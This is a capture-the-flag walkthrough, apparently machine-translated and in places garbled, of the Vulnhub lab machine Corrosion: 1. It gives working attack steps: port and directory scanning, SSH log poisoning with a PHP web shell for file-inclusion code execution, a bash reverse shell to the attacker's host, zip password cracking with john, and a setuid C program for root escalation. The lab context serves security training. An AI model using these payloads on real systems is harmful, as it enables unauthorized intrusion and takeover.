Vulnhub target machine Corrosion: 1 penetration test detailed explanation
Vulnhub target drone introduction:
Vulnhub is a comprehensive shooting range that provides a variety of vulnerability platforms. It can be downloaded from a variety of virtual machines, and the local VM can be opened. It is like playing a game to complete interesting combats such as penetration testing, privilege escalation, vulnerability exploitation, and code auditing.
This is a vulnerability target drone, just need to find the flag as usual.
Difficulty: Easy
Vulnhub target machine download:
Official website download: https://download.vulnhub.com/corrosion/Corrosion.ova
Vulnhub target machine installation:
After downloading, unzip the installation package and use it VMwareto open it.
Detailed Explanation of Vulnhub Target Machine Vulnerabilities:
①: Information collection:
kaliuse arp-scan -lor netdiscoverdiscover hosts
Use the command:
nmap -sS -sV -T4 -n -p- 192.168.0.103
Penetration machine: kali IP: 192.168.0.104 Target machine IP: 192.168.0.103
80It is found that the port and the port are opened 22, and the access 80port ( Apachedefault page) is scanned in the same way: dirb、dirsearch、whatweb、gobusteretc.
Here we scan to a /tasksdirectory to access and prompt us: Then use it dirsearchor gobusterscan to it /blog-postand then access
- Changing permissions for authorization logs
- change port
22 -> 7672 - set up
phpMyAdmin
gobuster dir -u http://192.168.0.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
whatweb 192.168.0.103
dirsearch -u http://192.168.0.103 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
②: Vulnerability discovery:
Found that there is no usable information, continue to collect information and try to scan the secondary directory and scan gobusterto one /archivesfor access
gobuster dir -u http://192.168.0.103/blog-post/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
There is nothing here, but it feels a bit like the file contains the source code and nothing is blank. Fuzzy ffufdetection to get the parameters fileand then file inclusion
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.0.103/blog-post/archives/randylogs.php?FUZZ=/var/log/auth.log' -fs 0
③: The file contains penetration (ssh log writing Trojan horse):
ssh '<?php system($_REQUEST['cmd']);?>'@192.168.0.103
view-source:http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig #查看发现执行成功!
④: Rebound Shell:
nc -lvvp 4444
echo "bash -i >& /dev/tcp/192.168.0.104/4444 0>&1" | bash #需要url编码
http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.0.104/4444%200%3E%261%22%20%7C%20bash #这里需要url编码
⑤: GCC compiled file rights escalation:
Get it shell, first look at the permissions and find that it is a low permission, www-dataso you need to escalate the permissions
sudo -lCheck to see if there are any executable sudofiles or hidden filesrandylogs.php
/varA file was found in the directory again backups, it may be a backup file
If you want to access the files in the target machine, you need to pythonopen a temporary web service: python3 -m http.server 8000download user_backup.zipdiscovery requires a password
Use here zip2john user_backup.zip > passwd.txtImport the password file into passwdthe file and use it johnto crack Here use a dictionary
If you do not add a dictionary, you will report an error when you end the process. Here comes a /root/.john/john.recsimilar process. Just delete it if you repeat it. Use rm -rf /root/.john/john.recthe command
rockyouYou can use this dictionary to blast using the dictionary , and you can also use fcrackzipthe blast to get the password:!randybaby
Here we know the account password and try to log in randyand find that the login is successful! ! !
Collect basic informationid,whoami,sudo -l
Here sudo -l, I found that /tools/easysysinfothe command can be executed without secrets, catrun it for a while, and then there is a cfile on whichit to check if there is anygcc
If there is, you can compile and create a new eastsysinfo.ccontent to see the code block, and then gcccompile sudoand run the compiled file.
#include "unistd.h"
#include "stdlib.h"
void main()
{
setuid(0);
setgid(0);
system("bash -i");
}
⑥: Get FLAG:
So far, the flag has been obtained, and the penetration of this article is over. Thank you for watching! !
Vulnhub target penetration summary:
The difficulty of this target machine is above the middle level because it is more troublesome
1. Information collection arp-scan -lObtain ip address and port information webScanning tool: nikto,dirb,dirbuster,whatweb,ffufwait to view F12the source code information
2. The file contains vulnerabilities, including log files sshWrite to the Trojan ssh '<?php system($_REQUEST['cmd']);?>'@target machine (new knowledge point!)
3. ncRebound shell(Encoding should be used here url) zip2johnblasting and fcrackzip(blasting compression package tool) and johnerror reporting solutions (new knowledge points!)
4. python3 -m http.server 8000Turn on temporary httpservices
5. gccCompile file privilege upgrade whichCheck if there are any useful commands in the system for privilege escalation
CorrosionThe first target drone in the series, I learned a lot of knowledge points and it was a very fruitful day (Yay yeah!) The
final creation is not easy, I hope it will be helpful to everyone, if you like it, please give me a one-click triple link Happiness is my greatest happiness! !